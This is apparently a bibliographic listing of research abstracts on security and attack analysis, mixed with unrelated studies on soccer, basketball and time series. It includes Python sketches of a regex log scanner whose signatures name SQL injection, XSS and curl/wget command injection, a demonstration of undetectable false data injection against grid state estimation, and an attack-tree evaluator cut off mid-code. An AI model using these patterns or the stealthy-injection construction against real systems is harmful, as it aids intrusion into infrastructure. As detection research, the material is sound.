    As nuclear facilities introduce digital systems, cyber security becomes an emerging topic to be analyzed and resolved. Domestic and foreign regulatory bodies have taken note of this topic and are preparing appropriate guidance. The nuclear industry, where new construction or upgrades of I and C systems are planned, is analyzing and establishing cyber security programs. A risk-based analysis for cyber security has been performed in the KNICS (Korea Nuclear I and C Systems) project, where the cyber security analysis has been applied to a reactor protection system (RPS). In this paper, a cyber security analysis based on attack trees is proposed for the KNICS RPS.

  5. METHODOLOGICAL APPROACH TO ANALYSIS AND EVALUATION OF INFORMATION PROTECTION IN INFORMATION SYSTEMS BASED ON VULNERABILITY DANGER

    Directory of Open Access Journals (Sweden)

    Y. M. Krotiuk

    2008-01-01

    Full Text Available The paper considers a methodological approach to the analysis and estimation of information security in information systems, based on the analysis of vulnerabilities and the extent of their hazard. By vulnerability hazard is meant the complexity of exploiting the vulnerability as part of an information system. The necessary and sufficient conditions for exploiting a vulnerability are determined in the paper. The paper proposes a generalized model of attack realization, which is used as a basis for constructing an attack realization model for the exploitation of a particular vulnerability. A criterion for estimating information protection in information systems, based on the estimation of vulnerability hazard, is formulated. The proposed approach allows a quantitative estimate of information system security to be obtained on the basis of the proposed schemes of typical attack realization for the distinguished classes of vulnerabilities. The methodological approach is used for choosing among variants for the realization of protection mechanisms in information systems, as well as for the estimation of information safety in operating information systems.

  6. Web server attack analyzer

    OpenAIRE

    Mižišin, Michal

    2013-01-01

    Web server attack analyzer - Abstract The goal of this work was to create a prototype analyzer of injection-flaw attacks on a web server. The proposed solution combines the capabilities of a web application firewall and a web server log analyzer. The analysis is based on configurable signatures defined by regular expressions. This paper begins with a summary of web attacks, followed by an analysis of detection techniques on web servers, and a description and justification of the selected implementation. In the end are charact...
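    As a flavour of signature-based detection over web server logs, here is a tiny hedged sketch (not the thesis prototype): a handful of regular-expression signatures for common injection patterns are applied to each access-log line and matches are reported. The signatures, signature names and log path are illustrative only.

```python
import re

# Illustrative signatures for common injection-style attacks in request URIs.
SIGNATURES = {
    "sql_injection": re.compile(r"(?i)(union\s+select|or\s+1\s*=\s*1|;--|'--)"),
    "path_traversal": re.compile(r"(?i)(\.\./|%2e%2e%2f)"),
    "xss": re.compile(r"(?i)(<script|%3cscript)"),
    "command_injection": re.compile(r"(?i)(;|\|\|)\s*(cat|ls|wget|curl)\b"),
}

def scan_log(path="access.log"):
    """Yield (line number, matched signature names, line) for suspicious entries."""
    with open(path, errors="replace") as log:
        for lineno, line in enumerate(log, start=1):
            hits = [name for name, rx in SIGNATURES.items() if rx.search(line)]
            if hits:
                yield lineno, hits, line.rstrip()

if __name__ == "__main__":
    for lineno, hits, line in scan_log():
        print(f"line {lineno}: {', '.join(hits)} :: {line[:120]}")
```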

  7. Using a Realist Research Methodology in Policy Analysis

    Science.gov (United States)

    Lourie, Megan; Rata, Elizabeth

    2017-01-01

    The article describes the usefulness of a realist methodology in linking sociological theory to empirically obtained data through the development of a methodological device. Three layers of analysis were integrated: 1. the findings from a case study about Maori language education in New Zealand; 2. the identification and analysis of contradictions…

  8. The methodology of semantic analysis for extracting physical effects

    Science.gov (United States)

    Fomenkova, M. A.; Kamaev, V. A.; Korobkin, D. M.; Fomenkov, S. A.

    2017-01-01

    The paper presents a new methodology of semantic analysis for extracting physical effects. This methodology is based on the Tuzov ontology, which formally describes the Russian language. Semantic patterns are described to extract structural physical information in the form of physical effects, and a new text analysis algorithm is described.

  9. Development of analysis methodology on turbulent thermal stripping

    Energy Technology Data Exchange (ETDEWEB)

    Yoo, Geun Jong; Jeon, Won Dae; Han, Jin Woo; Gu, Byong Kook [Changwon National University, Changwon(Korea)

    2001-03-01

    For developing the analysis methodology, the important governing factors of the thermal stripping phenomenon are identified as geometric configuration and flow characteristics such as velocity. Along these factors, the performance of turbulence models in the existing analysis methodology is evaluated against experimental data. The status of DNS application is also assessed based on the literature. The evaluation results are reflected in setting up the new analysis methodology. From the evaluation of the existing analysis methodology, the Full Reynolds Stress (FRS) model is identified as the best among the turbulence models considered, and LES is found to be able to provide time-dependent turbulence values. Further improvements in the near-wall region and in the temperature variance equation are required for FRS, and the implementation of new sub-grid scale models is required for LES. Through these improvements, a new, reliable analysis methodology for thermal stripping can be developed. 30 refs., 26 figs., 6 tabs. (Author)

  10. An Analysis of Media’s Role: Case Study of Army Public School (APS Peshawar Attack

    Directory of Open Access Journals (Sweden)

    Qureshi Rameesha

    2016-12-01

    Full Text Available The study aimed at analyzing the role of media during and after terrorist attacks by examining the media handling of the APS Peshawar attack. The sample consisted of males and females selected on a convenience basis from universities of Rawalpindi and Islamabad. It was hypothesized that (1) extensive media coverage of terrorist attacks leads to greater publicity/recognition of terrorist groups, (2) media coverage of the APS Peshawar attack increased fear and anxiety in the public, and (3) positive media handling/coverage of the APS Peshawar attack led to public solidarity and peace. The results indicate that (i) media coverage of terrorist attacks does help terrorist groups gain publicity and recognition amongst the public, and (ii) media coverage of the APS Peshawar attack did not increase fear/anxiety; in fact, it directed the Pakistani nation towards public solidarity and peace.

  11. A Goal based methodology for HAZOP analysis

    DEFF Research Database (Denmark)

    Rossing, Netta Liin; Lind, Morten; Jensen, Niels

    2010-01-01

    …to nodes with simple functions such as liquid transport, gas transport, liquid storage, gas-liquid contacting etc. From the functions of the nodes, the selection of relevant process variables and deviation variables follows directly. The knowledge required to perform the pre-meeting HAZOP task of dividing the plant along functional lines is that of chemical unit operations and transport processes, plus some familiarity with the plant at hand. Thus the preparatory work may be performed by a chemical engineer with just an introductory course in risk assessment. The goal-based methodology lends itself directly…

  12. Methodology for risk analysis of nuclear installations

    International Nuclear Information System (INIS)

    Vasconcelos, Vanderley de; Senne Junior, Murillo; Jordao, Elizabete

    2002-01-01

    Both the licensing standards for general uses in nuclear facilities and the specific ones require a risk assessment during their licensing processes. The risk assessment is carried out through the estimation of both the probability of occurrence of accidents and their magnitudes. This is a complex task because the great number of potentially hazardous events that can occur in nuclear facilities makes it difficult to state the accident scenarios. There are also many available techniques to identify the potential accidents, estimate their probabilities, and evaluate their magnitudes. This paper presents a new methodology that systematizes the risk assessment process and orders the accomplishment of its several steps. (author)

  13. Bifurcation analysis and stability design for aircraft longitudinal motion with high angle of attack

    Directory of Open Access Journals (Sweden)

    Xin Qi

    2015-02-01

    Full Text Available Bifurcation analysis and stability design for aircraft longitudinal motion are investigated when the nonlinearity in the flight dynamics becomes severe in the high angle of attack regime. To predict the special nonlinear flight phenomena, bifurcation theory and the continuation method are employed to systematically analyze the nonlinear motions. With the refinement of the flight dynamics for the F-8 Crusader longitudinal motion, a framework is derived to identify the stationary and dynamic bifurcations of the high-dimensional system. The case study shows that the F-8 longitudinal motion undergoes saddle-node bifurcation, Hopf bifurcation, zero-Hopf bifurcation and branch-point bifurcation under certain conditions. Moreover, the Hopf bifurcation produces a series of multiple-frequency pitch oscillation phenomena, which severely deteriorate flight control stability. To relieve the adverse effects of these phenomena, a stabilization control based on gain scheduling and polynomial fitting for the F-8 longitudinal motion is presented to enlarge the flight envelope. Simulation results validate the effectiveness of the proposed scheme.

  14. How Game Location Affects Soccer Performance: T-Pattern Analysis of Attack Actions in Home and Away Matches

    Directory of Open Access Journals (Sweden)

    Barbara Diana

    2017-08-01

    Full Text Available The influence of game location on performance has been widely examined in sport contexts. Concerning soccer, game location positively affects the secondary and tertiary levels of performance; however, there is less evidence about its effect on game structure (the primary level of performance). This study aimed to detect the effect of game location on the primary level of performance in soccer. In particular, the objective was to reveal the hidden structures underlying the attack actions in both home and away matches played by a top club (Serie A 2012/2013, first leg). The methodological approach was based on systematic observation, supported by digital recordings and T-pattern analysis. Data were analyzed with THEME 6.0 software. A quantitative analysis, with the nonparametric Mann-Whitney test and descriptive statistics, was carried out to test the hypotheses. A qualitative analysis of complex patterns was performed to obtain in-depth information on game structure. The study showed that game tactics were significantly different, with home matches characterized by a more structured and varied game than away matches. In particular, a higher number of different patterns, with a higher level of complexity and including more unique behaviors, was detected in home matches than in away ones. No significant differences were found in the number of events coded per game between the two conditions. The THEME software, and the corresponding T-pattern detection algorithm, enhance research opportunities by going beyond frequency-based analyses, making this method an effective tool for supporting sport performance analysis and training.

  15. How Game Location Affects Soccer Performance: T-Pattern Analysis of Attack Actions in Home and Away Matches.

    Science.gov (United States)

    Diana, Barbara; Zurloni, Valentino; Elia, Massimiliano; Cavalera, Cesare M; Jonsson, Gudberg K; Anguera, M Teresa

    2017-01-01

    The influence of game location on performance has been widely examined in sport contexts. Concerning soccer, game location positively affects the secondary and tertiary levels of performance; however, there is less evidence about its effect on game structure (the primary level of performance). This study aimed to detect the effect of game location on the primary level of performance in soccer. In particular, the objective was to reveal the hidden structures underlying the attack actions in both home and away matches played by a top club (Serie A 2012/2013, first leg). The methodological approach was based on systematic observation, supported by digital recordings and T-pattern analysis. Data were analyzed with THEME 6.0 software. A quantitative analysis, with the nonparametric Mann-Whitney test and descriptive statistics, was carried out to test the hypotheses. A qualitative analysis of complex patterns was performed to obtain in-depth information on game structure. The study showed that game tactics were significantly different, with home matches characterized by a more structured and varied game than away matches. In particular, a higher number of different patterns, with a higher level of complexity and including more unique behaviors, was detected in home matches than in away ones. No significant differences were found in the number of events coded per game between the two conditions. The THEME software, and the corresponding T-pattern detection algorithm, enhance research opportunities by going beyond frequency-based analyses, making this method an effective tool for supporting sport performance analysis and training.

  16. Vesper: Using Echo-Analysis to Detect Man-in-the-Middle Attacks in LANs

    OpenAIRE

    Mirsky, Yisroel; Kalbo, Naor; Elovici, Yuval; Shabtai, Asaf

    2018-01-01

    The Man-in-the-Middle (MitM) attack is a cyber-attack in which an attacker intercepts traffic, thus harming the confidentiality, integrity, and availability of the network. It remains a popular attack vector due to its simplicity. However, existing solutions are either not portable, suffer from a high false positive rate, or are simply not generic. In this paper, we propose Vesper: a novel plug-and-play MitM detector for local area networks. Vesper uses a technique inspired by impulse respo...

  17. Cyber attacks against state estimation in power systems: Vulnerability analysis and protection strategies

    Science.gov (United States)

    Liu, Xuan

    The power grid is one of the most critical infrastructures in a nation and could suffer a variety of cyber attacks. With the development of the Smart Grid, false data injection attacks have recently attracted wide research interest. This thesis proposes a false data attack model with incomplete network information and develops optimal attack strategies for attacking load measurements and the real-time topology of a power grid. The impacts of false data on the economic and reliable operation of power systems are quantitatively analyzed in this thesis. To mitigate the risk of cyber attacks, distributed protection strategies are also developed. It has been shown that an attacker can design false data to avoid being detected by the control center if the network information of a power grid is known to the attacker. In practice, however, it is very hard or even impossible for an attacker to obtain all network information of a power grid. In this thesis, we propose a local load redistribution attack model based on incomplete network information and show that an attacker only needs to obtain the network information of the local attacking region to inject false data into smart meters in that region without being detected by the state estimator. A heuristic algorithm is developed to determine a feasible attacking region by obtaining reduced network information. This thesis also investigates the impacts of false data on the operation of power systems. It has been shown that false data can be designed by an attacker to: 1) mask the real-time topology of a power grid; 2) overload a transmission line; 3) disturb line outage detection based on PMU data. To mitigate the risk of cyber attacks, this thesis proposes a new protection strategy, which intends to mitigate the damage effects of false data injection attacks by protecting a small set of critical measurements. To further reduce the computational complexity, a mixed integer linear programming approach is also proposed to
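    The core observation behind undetectable false data injection, referred to above, can be reproduced in a few lines: for a linear (DC) state-estimation model z = Hx + e with a least-squares estimator, an attack vector of the form a = Hc shifts the estimated state by c but leaves the measurement residual, and hence residual-based bad-data detection, unchanged. The matrix below is a random stand-in, not a real grid model.

```python
import numpy as np

rng = np.random.default_rng(0)
m, n = 12, 5                      # measurements, states (toy dimensions)
H = rng.normal(size=(m, n))       # stand-in measurement Jacobian
x_true = rng.normal(size=n)
z = H @ x_true + 0.01 * rng.normal(size=m)   # noisy measurements

def estimate(z_vec):
    """Least-squares state estimate (unit weights) and residual norm."""
    x_hat, *_ = np.linalg.lstsq(H, z_vec, rcond=None)
    return x_hat, np.linalg.norm(z_vec - H @ x_hat)

c = rng.normal(size=n)            # attacker's desired bias on the state estimate
a = H @ c                         # "stealthy" false data injection vector

x0, r0 = estimate(z)
x1, r1 = estimate(z + a)
print("state shift   :", x1 - x0)   # equal to c (up to floating point)
print("residual norms:", r0, r1)    # identical -> bad-data detector sees nothing
```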

  18. Update of Part 61 Impacts Analysis Methodology. Methodology report. Volume 1

    Energy Technology Data Exchange (ETDEWEB)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    Under contract to the US Nuclear Regulatory Commission, the Envirosphere Company has expanded and updated the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of the costs and impacts of treatment and disposal of low-level waste that is close to or exceeds Class C concentrations. The modifications described in this report principally include: (1) an update of the low-level radioactive waste source term, (2) consideration of additional alternative disposal technologies, (3) expansion of the methodology used to calculate disposal costs, (4) consideration of an additional exposure pathway involving direct human contact with disposed waste due to a hypothetical drilling scenario, and (5) use of updated health physics analysis procedures (ICRP-30). Volume 1 of this report describes the calculational algorithms of the updated analysis methodology.

  19. Update of Part 61 Impacts Analysis Methodology. Methodology report. Volume 1

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    Under contract to the US Nuclear Regulatory Commission, the Envirosphere Company has expanded and updated the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of the costs and impacts of treatment and disposal of low-level waste that is close to or exceeds Class C concentrations. The modifications described in this report principally include: (1) an update of the low-level radioactive waste source term, (2) consideration of additional alternative disposal technologies, (3) expansion of the methodology used to calculate disposal costs, (4) consideration of an additional exposure pathway involving direct human contact with disposed waste due to a hypothetical drilling scenario, and (5) use of updated health physics analysis procedures (ICRP-30). Volume 1 of this report describes the calculational algorithms of the updated analysis methodology

  20. Shuttle TPS thermal performance and analysis methodology

    Science.gov (United States)

    Neuenschwander, W. E.; Mcbride, D. U.; Armour, G. A.

    1983-01-01

    Thermal performance of the thermal protection system was approximately as predicted. The only extensive anomalies were filler bar scorching and over-predictions in the high Delta p gap heating regions of the orbiter. A technique to predict filler bar scorching has been developed that can aid in defining a solution. Improvement in high Delta p gap heating methodology is still under study. Minor anomalies were also examined for improvements in modeling techniques and prediction capabilities. These include improved definition of low Delta p gap heating, an analytical model for inner mode line convection heat transfer, better modeling of structure, and inclusion of sneak heating. The limited number of problems related to penetration items that presented themselves during orbital flight tests were resolved expeditiously, and designs were changed and proved successful within the time frame of that program.

  1. METHODOLOGICAL ANALYSIS OF TRAINING STUDENT basketball teams

    Directory of Open Access Journals (Sweden)

    Kozina Zh.L.

    2011-06-01

    Full Text Available The leading principles of the preparation of student basketball teams in higher education institutions are considered. The system includes the following: reliance on top-quality players in the structure of preparedness, widespread use of visual aids, teaching films and animations recording the execution of various techniques by professional basketball players, and the application of methods of autogenic and ideomotor training according to our methodology. The study involved 63 students (years 1-5) of the first and second categories from various universities of Kharkov: 32 in the experimental group and 31 in the control group. The developed system of training student basketball players was used for 1 year. The results show the efficiency of the developed system in the training process of student basketball players.

  2. An economic analysis methodology for project evaluation and programming.

    Science.gov (United States)

    2013-08-01

    Economic analysis is a critical component of a comprehensive project or program evaluation methodology that considers all key quantitative and qualitative impacts of highway investments. It allows highway agencies to identify, quantify, and value t...

  3. Development of Advanced Non-LOCA Analysis Methodology for Licensing

    International Nuclear Information System (INIS)

    Jang, Chansu; Um, Kilsup; Choi, Jaedon

    2008-01-01

    KNF is developing a new design methodology for Non-LOCA analysis for licensing purposes. The code chosen is the best-estimate transient analysis code RETRAN, and the OPR1000 is the target plant. For this purpose, KNF prepared a simple nodal scheme appropriate to licensing analyses and developed the designer-friendly analysis tool ASSIST (Automatic Steady-State Initialization and Safety analysis Tool). To check the validity of the newly developed methodology, the single CEA withdrawal and locked rotor accidents are analyzed using the new methodology and compared with current design results. The comparison shows good agreement, and it is concluded that the new design methodology can be applied to licensing calculations for OPR1000 Non-LOCA analyses

  4. Opening Remarks of the Acquisition Path Analysis Methodology Session

    International Nuclear Information System (INIS)

    Renis, T.

    2015-01-01

    An overview of the recent development work that has been done on acquisition path analysis, implementation of the methodologies within the Department of Safeguards, lessons learned and future areas for development will be provided. (author)

  5. Vulnerability and Risk Analysis Program: Overview of Assessment Methodology

    National Research Council Canada - National Science Library

    2001-01-01

    .... Over the last three years, a team of national laboratory experts, working in partnership with the energy industry, has successfully applied the methodology as part of OCIP's Vulnerability and Risk Analysis Program (VRAP...

  6. A methodology for the data energy regional consumption consistency analysis

    International Nuclear Information System (INIS)

    Canavarros, Otacilio Borges; Silva, Ennio Peres da

    1999-01-01

    The article introduces a methodology for the consistency analysis of regional energy consumption data. The work is based on recent studies accomplished by several cited authors and addresses the Brazilian energy matrices and regional energy balances. The results are compared and analyzed

  7. Reachable Sets of Hidden CPS Sensor Attacks : Analysis and Synthesis Tools

    NARCIS (Netherlands)

    Murguia, Carlos; van de Wouw, N.; Ruths, Justin; Dochain, Denis; Henrion, Didier; Peaucelle, Dimitri

    2017-01-01

    For given system dynamics, control structure, and fault/attack detection procedure, we provide mathematical tools–in terms of Linear Matrix Inequalities (LMIs)–for characterizing and minimizing the set of states that sensor attacks can induce in the system while keeping the alarm rate of the

  8. Lone Actor Terrorist Attack Planning and Preparation : A Data-Driven Analysis

    NARCIS (Netherlands)

    Schuurman, B.W.; Bakker, E.; Gill, P.; Bouhana, N.

    2017-01-01

    This article provides an in-depth assessment of lone actor terrorists’ attack planning and preparation. A codebook of 198 variables related to different aspects of pre-attack behavior is applied to a sample of 55 lone actor terrorists. Data were drawn from open-source materials and complemented

  9. A system for denial-of-service attack detection based on multivariate correlation analysis

    NARCIS (Netherlands)

    Tan, Zhiyuan; Jamdagni, Aruna; He, Xiangjian; Nanda, Priyadarsi; Liu, Ren Ping

    Interconnected systems, such as Web servers, database servers, cloud computing servers and so on, are now under threat from network attackers. As one of the most common and aggressive means, denial-of-service (DoS) attacks cause serious impact on these computing systems. In this paper, we present a DoS

  10. Severe accident analysis methodology in support of accident management

    International Nuclear Information System (INIS)

    Boesmans, B.; Auglaire, M.; Snoeck, J.

    1997-01-01

    The author addresses the implementation at BELGATOM of a generic severe accident analysis methodology, which is intended to support strategic decisions and to provide quantitative information in support of severe accident management. The analysis methodology is based on a combination of severe accident code calculations, generic phenomenological information (experimental evidence from various test facilities regarding issues beyond present code capabilities) and detailed plant-specific technical information

  11. Radiochemical Analysis Methodology for uranium Depletion Measurements

    Energy Technology Data Exchange (ETDEWEB)

    Scatena-Wachel DE

    2007-01-09

    This report provides sufficient material for a test sponsor with little or no radiochemistry background to understand and follow physics irradiation test program execution. Most irradiation test programs employ similar techniques and the general details provided here can be applied to the analysis of other irradiated sample types. Aspects of program management directly affecting analysis quality are also provided. This report is not an in-depth treatise on the vast field of radiochemical analysis techniques and related topics such as quality control. Instrumental technology is a very fast growing field and dramatic improvements are made each year, thus the instrumentation described in this report is no longer cutting edge technology. Much of the background material is still applicable and useful for the analysis of older experiments and also for subcontractors who still retain the older instrumentation.

  12. Diversion Path Analysis Handbook. Volume 1. Methodology

    International Nuclear Information System (INIS)

    Goodwin, K.E.; Schleter, J.C.; Maltese, M.D.K.

    1978-11-01

    Diversion Path Analysis (DPA) is a safeguards evaluation tool which is used to determine the vulnerability of the Material Control and Material Accounting (MC and MA) Subsystems to the threat of theft of Special Nuclear Material (SNM) by a knowledgeable Insider. The DPA team should consist of two individuals who have technical backgrounds. The implementation of DPA is divided into five basic steps: Information and Data Gathering, Process Characterization, Analysis of Diversion Paths, Results and Findings, and Documentation

  13. Real-Time Detection of Application-Layer DDoS Attack Using Time Series Analysis

    Directory of Open Access Journals (Sweden)

    Tongguang Ni

    2013-01-01

    Full Text Available Distributed denial of service (DDoS) attacks are one of the major threats to the current Internet, and application-layer DDoS attacks utilizing legitimate HTTP requests to overwhelm victim resources are harder to detect. Consequently, neither intrusion detection systems (IDS) nor the victim server can detect the malicious packets. In this paper, a novel approach to detect application-layer DDoS attacks is proposed based on the entropy of HTTP GET requests per source IP address (HRPI). By approximating the adaptive autoregressive (AAR) model, the HRPI time series is transformed into a multidimensional vector series. Then, a trained support vector machine (SVM) classifier is applied to identify the attacks. Experiments with several databases were performed, and the results show that this approach can detect application-layer DDoS attacks effectively.
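    To make the HRPI feature concrete, the sketch below (an illustration, not the paper's implementation) computes the Shannon entropy of HTTP GET request counts per source IP over fixed time windows; when a flood is driven by a skewed set of sources, this entropy shifts markedly from its baseline, and the resulting per-window series is the kind of signal that would then be modeled (e.g., by an AAR model) and classified. Window length and the toy traffic are arbitrary.

```python
import math
from collections import Counter, defaultdict

def hrpi_entropy(requests, window_seconds=10):
    """
    requests: iterable of (timestamp, source_ip) for HTTP GET requests.
    Returns a list of (window_start, entropy_bits), where the entropy is the
    Shannon entropy of the per-source request distribution inside each window.
    """
    windows = defaultdict(Counter)
    for ts, ip in requests:
        windows[int(ts // window_seconds) * window_seconds][ip] += 1

    series = []
    for start in sorted(windows):
        counts = windows[start]
        total = sum(counts.values())
        h = -sum((c / total) * math.log2(c / total) for c in counts.values())
        series.append((start, h))
    return series

# Toy traffic: a balanced baseline window, then a window dominated by one source.
toy = [(1, "10.0.0.%d" % (i % 8)) for i in range(80)] + \
      [(12, "10.0.0.99")] * 200 + [(13, "10.0.0.1")] * 5
for start, h in hrpi_entropy(toy):
    print(f"window {start:>3}s: entropy = {h:.2f} bits")
```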

  14. Techniques of sample attack used in soil and mineral analysis. Phase I

    International Nuclear Information System (INIS)

    Chiu, N.W.; Dean, J.R.; Sill, C.W.

    1984-07-01

    Several techniques of sample attack for the determination of radioisotopes are reviewed. These techniques include: 1) digestion with nitric or hydrochloric acid in a Parr digestion bomb, 2) digestion with a mixture of nitric and hydrochloric acids, 3) digestion with a mixture of hydrofluoric, nitric and perchloric acids, and 4) fusion with sodium carbonate, potassium fluoride or alkali pyrosulfates. The effectiveness of these techniques in decomposing various soils and minerals containing radioisotopes such as lead-210, uranium, thorium and radium-226 is discussed. The combined procedure of potassium fluoride fusion followed by alkali pyrosulfate fusion is recommended for radium-226, uranium and thorium analysis. This technique guarantees the complete dissolution of samples containing refractory materials such as silica, silicates, carbides, oxides and sulfates. For lead-210 analysis, the procedure of digestion with a mixture of hydrofluoric, nitric and perchloric acids followed by fusion with alkali pyrosulfate is recommended. These two procedures are detailed. Schemes for the sequential separation of the radioisotopes from a dissolved sample solution are outlined, and procedures for radiochemical analysis are suggested

  15. SINGULAR SPECTRUM ANALYSIS: METHODOLOGY AND APPLICATION TO ECONOMICS DATA

    Institute of Scientific and Technical Information of China (English)

    Hossein HASSANI; Anatoly ZHIGLJAVSKY

    2009-01-01

    This paper describes the methodology of singular spectrum analysis (SSA) and demonstrates that it is a powerful method of time series analysis and forecasting, particularly for economic time series. The authors consider the application of SSA to the analysis and forecasting of the Iranian national accounts data as provided by the Central Bank of the Islamic Republic of Iran.
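    For orientation, basic SSA reduces to three steps: embed the series into a trajectory (Hankel) matrix, take its singular value decomposition, and reconstruct selected components by anti-diagonal averaging. The sketch below shows those steps on a synthetic series; it is a minimal illustration, not the authors' procedure, and the window length and number of components are arbitrary choices.

```python
import numpy as np

def ssa_reconstruct(series, window, n_components):
    """Reconstruct `series` from its leading `n_components` SSA components."""
    x = np.asarray(series, dtype=float)
    N, L = len(x), window
    K = N - L + 1
    # 1) Embedding: trajectory (Hankel) matrix whose columns are lagged windows.
    X = np.column_stack([x[i:i + L] for i in range(K)])
    # 2) Decomposition: singular value decomposition of the trajectory matrix.
    U, s, Vt = np.linalg.svd(X, full_matrices=False)
    Xr = (U[:, :n_components] * s[:n_components]) @ Vt[:n_components]
    # 3) Reconstruction: Hankelisation by averaging over anti-diagonals.
    recon, counts = np.zeros(N), np.zeros(N)
    for i in range(L):
        for j in range(K):
            recon[i + j] += Xr[i, j]
            counts[i + j] += 1
    return recon / counts

# Synthetic "economic" series: trend + seasonal cycle + noise.
t = np.arange(120)
rng = np.random.default_rng(1)
y = 0.05 * t + np.sin(2 * np.pi * t / 12) + 0.3 * rng.normal(size=t.size)
smooth = ssa_reconstruct(y, window=24, n_components=3)
print("residual std after keeping 3 components:", np.std(y - smooth).round(3))
```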

  16. Gap analysis methodology for business service engineering

    NARCIS (Netherlands)

    Nguyen, D.K.; van den Heuvel, W.J.A.M.; Papazoglou, M.; de Castro, V.; Marcos, E.; Hofreiter, B.; Werthner, H.

    2009-01-01

    Many of today’s service analysis and design techniques rely on ad-hoc and experience-based identification of value-creating business services and implicitly assume a “green-field” situation focusing on the development of completely new services while offering very limited support for discovering

  17. Discourse analysis: making complex methodology simple

    NARCIS (Netherlands)

    Bondarouk, Tatiana; Ruel, Hubertus Johannes Maria; Leino, T.; Saarinen, T.; Klein, S.

    2004-01-01

    Discourse-based analysis of organizations is not new in the field of interpretive social studies. Only recently, however, have information systems (IS) studies also shown a keen interest in discourse (Wynn et al., 2002). The IS field has grown significantly in its multiplicity, which is echoed in the

  18. Towards the Development of a Methodology for the Cyber Security Analysis of Safety Related Nuclear Digital I and C Systems

    International Nuclear Information System (INIS)

    Khand, Parvaiz Ahmed; Seong, Poong Hyun

    2007-01-01

    In nuclear power plants, redundant safety-related systems are designed to take automatic action to prevent and mitigate accident conditions if the operators and the non-safety systems fail to maintain the plant within normal operating conditions. In case of an event, the failure of these systems has catastrophic consequences. The tendency in the industry over the past 10 years has been to use commercial off-the-shelf (COTS) technologies in these systems. COTS software was written with attention to function and performance rather than security. COTS hardware is usually designed to fail safe, but security vulnerabilities could be exploited by an attacker to disable the fail-safe mechanisms. Moreover, the use of open protocols and operating systems in these technologies makes the plants vulnerable to a host of cyber attacks. An effective security analysis process is required during all life cycle phases of these systems in order to ensure security against cyber attacks. We are developing a methodology for the cyber security analysis of safety-related nuclear digital I and C systems. This methodology will cover all phases of the development, operation and maintenance processes of the software life cycle. In this paper, we present a security analysis process for the concept stage of the software development life cycle

  19. Scenario aggregation and analysis via Mean-Shift Methodology

    International Nuclear Information System (INIS)

    Mandelli, D.; Yilmaz, A.; Metzroth, K.; Aldemir, T.; Denning, R.

    2010-01-01

    A new generation of dynamic methodologies is being developed for nuclear reactor probabilistic risk assessment (PRA) which explicitly account for the time element in modeling the probabilistic system evolution and use numerical simulation tools to account for possible dependencies between failure events. The dynamic event tree (DET) approach is one of these methodologies. One challenge with dynamic PRA methodologies is the large amount of data they produce, which may be difficult to analyze without appropriate software tools. The concept of 'data mining' is well known in the computer science community, and several methodologies have been developed to extract useful information from a dataset with a large number of records. Using the dataset generated by the DET analysis of the reactor vessel auxiliary cooling system (RVACS) of an ABR-1000 for an aircraft crash recovery scenario, and the mean-shift methodology for data mining, it is shown how clusters of transients with common characteristics can be identified and classified. (authors)
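    As a pointer to how such clustering might look in practice, the snippet below applies scikit-learn's MeanShift to a toy matrix of scenario features; the feature names (time to failure, peak temperature) and all values are invented stand-ins for DET outputs, not the actual RVACS dataset.

```python
import numpy as np
from sklearn.cluster import MeanShift, estimate_bandwidth
from sklearn.preprocessing import StandardScaler

# Invented scenario features standing in for DET outputs:
# column 0 = time to core damage (hours), column 1 = peak cladding temperature (K).
rng = np.random.default_rng(42)
scenarios = np.vstack([
    rng.normal([5.0, 900.0], [0.5, 20.0], size=(40, 2)),    # benign recovery group
    rng.normal([2.0, 1400.0], [0.3, 30.0], size=(25, 2)),   # fast-failure group
    rng.normal([8.0, 1100.0], [0.6, 25.0], size=(35, 2)),   # delayed-failure group
])

X = StandardScaler().fit_transform(scenarios)          # put features on one scale
bandwidth = estimate_bandwidth(X, quantile=0.2)        # kernel width for mean shift
labels = MeanShift(bandwidth=bandwidth).fit_predict(X)

for cluster in np.unique(labels):
    members = scenarios[labels == cluster]
    print(f"cluster {cluster}: {len(members)} scenarios, "
          f"mean time-to-failure {members[:, 0].mean():.1f} h, "
          f"mean peak temperature {members[:, 1].mean():.0f} K")
```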

  20. Methodological aspects on drug receptor binding analysis

    International Nuclear Information System (INIS)

    Wahlstroem, A.

    1978-01-01

    Although drug receptors occur in relatively low concentrations, they can be visualized by the use of appropriate radioindicators. In most cases the procedure is rapid and can reach a high degree of accuracy. Specificity of the interaction is studied by competition analysis. The necessity of using several radioindicators to define a receptor population is emphasized. It may be possible to define isoreceptors and drugs with selectivity for one isoreceptor. (Author)

  1. Attack surfaces

    DEFF Research Database (Denmark)

    Gruschka, Nils; Jensen, Meiko

    2010-01-01

    The new paradigm of cloud computing poses severe security risks to its adopters. In order to cope with these risks, appropriate taxonomies and classification criteria for attacks on cloud computing are required. In this work-in-progress paper we present one such taxonomy based on the notion of attack surfaces of the cloud computing scenario participants.

  2. Attack tree analysis for insider threats on the IoT using isabelle

    DEFF Research Database (Denmark)

    Kammüller, Florian; Nurse, Jason R. C.; Probst, Christian W.

    2016-01-01

    The Internet-of-Things (IoT) aims at integrating small devices around humans. The threat from human insiders in "regular" organisations is real; in a fully-connected world of the IoT, organisations face a substantially more severe security challenge due to unexpected access possibilities and info....... On the classified IoT attack examples, we show how this logical approach can be used to make the models more precise and to analyse the previously identified Insider IoT attacks using Isabelle attack trees....
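
    The record above works with Isabelle's formal attack-tree framework; as a plain illustration of the underlying idea only (not the authors' formalisation), the sketch below evaluates a small AND/OR attack tree for a hypothetical insider-assisted IoT compromise with invented leaf probabilities:

        from dataclasses import dataclass, field
        from typing import List

        @dataclass
        class Node:
            name: str
            gate: str = "LEAF"          # "AND", "OR" or "LEAF"
            prob: float = 0.0           # success probability for leaf attacks
            children: List["Node"] = field(default_factory=list)

        def success_probability(node: Node) -> float:
            # Assumes independent sub-attacks: AND multiplies, OR uses the complement rule.
            if node.gate == "LEAF":
                return node.prob
            probs = [success_probability(c) for c in node.children]
            if node.gate == "AND":
                result = 1.0
                for p in probs:
                    result *= p
                return result
            result = 1.0                 # OR gate
            for p in probs:
                result *= (1.0 - p)
            return 1.0 - result

        tree = Node("compromise smart-building data", "OR", children=[
            Node("external exploit of IoT gateway", prob=0.05),
            Node("insider-assisted path", "AND", children=[
                Node("insider has physical access", prob=0.6),
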